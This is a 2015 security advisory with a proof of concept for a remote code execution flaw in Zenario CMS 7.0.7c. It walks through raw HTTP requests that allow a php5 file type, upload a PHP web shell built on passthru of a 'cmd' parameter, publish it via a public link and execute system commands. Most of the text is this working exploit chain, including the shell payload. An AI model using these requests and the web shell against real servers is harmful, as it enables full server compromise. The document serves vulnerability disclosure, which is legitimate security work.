Zenario CMS 7.0.7c Remote Code Execution Vulnerability Vendor: Tribal Ltd. Product web page: http://www.zenar.io Affected version: <= 7.0.7c and 7.1.0 (svn) Summary: Zenario is a web-based content management system for sites with one or many languages. It's designed to grow with your site, adding extranet, online database and custom functionality when you need it. Desc: The vulnerability is caused due to the improper verification of uploaded files via the Document upload script using 'Filedata' POST parameter which allows of arbitrary files being uploaded in '/public/downloads/' following a publicaly generated link for access where the admin first needs to add the file extension in the allowed list. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script file and execute system commands. Tested on: Ubuntu 14.04 LTS PHP 5.5.9-1ubuntu4.1 Zend Engine v2.5.0 Zend OPcache v7.0.3 MySQL/5.5.37 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5280 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5280.php Vendor: http://zenar.io/zenario-707d 27.10.2015 -- ---------------------- 1. Add php5 file type: GET http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__administration/panels/file_types HTTP/1.1 POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_file_type HTTP/1.1 Host: 192.168.0.17 Connection: keep-alive Content-Length: 516 Accept: text/plain, */*; q=0.01 Origin: http://192.168.0.17 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35 _save=true&_confirm=&_box={"key":{"id":""},"tabs":{"details":{"edit_mode":{"on":1},"fields":{"type":{"current_value":"php5"},"mime_type":{"current_value":"application/octet-stream"}}}},"_sync":{"cache_dir":"ab_PBtBxW05_mPQDMgpv","password":"/L9HLsICPXzTD93VPn4Ou2Yw6HW6f4CPMFANLol7rcI=","iv":"7XoL6dLYAaMfqXgy7DfOeQ==","session":false}} --------------- 2. Upload file: POST /zenario/ajax.php?__pluginClassName__=undefined&__path__=zenario_document_upload&method_call=handleAdminBoxAJAX HTTP/1.1 Host: 192.168.0.17 Content-Length: 458 Origin: http://192.168.0.17 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36 X_FILENAME: phpinfo.php5 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUrDf3o8emcPIM8oD Accept: */* Referer: http://192.168.0.17/zenario/admin/organizer.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35 ------WebKitFormBoundaryUrDf3o8emcPIM8oD Content-Disposition: form-data; name="id" 12 ------WebKitFormBoundaryUrDf3o8emcPIM8oD Content-Disposition: form-data; name="fileUpload" 1 ------WebKitFormBoundaryUrDf3o8emcPIM8oD Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php5" Content-Type: application/octet-stream "; passthru($_GET['cmd']); echo ""; ?> ------WebKitFormBoundaryUrDf3o8emcPIM8oD-- ------------------------ 3. Save and verify file: POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_document_upload&id=12 HTTP/1.1 Host: 192.168.0.17 Content-Length: 530 Accept: text/plain, */*; q=0.01 Origin: http://192.168.0.17 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.0.17/zenario/admin/organizer.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35 _save=true&_confirm=&_box={"key":{"id":"12","fileUpload":1},"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"_display_value":"phpinfo.php5","current_value":"~79fa169880192652f933c1834aae09f40c4fc39c~2Fphpinfo.php5"}}}},"_sync":{"cache_dir":"ab_uMwuijj5_YP_0GAuZ","password":"/NUErtsIJtkXJXJqRr0pbt8oqAIUqz0GVdjJung5J/4=","session":false}} ------------------------ 4. Generate public link: POST /zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX HTTP/1.1 Host: 192.168.0.17 Content-Length: 28 Accept: text/plain, */*; q=0.01 Origin: http://192.168.0.17 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.0.17/zenario/admin/organizer.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35 id=27&generate_public_link=1 ---------------- 5. Execute code: GET http://192.168.0.17/zenario/public/downloads/RvoId/phpinfo.php5?cmd=id;pwd HTTP/1.1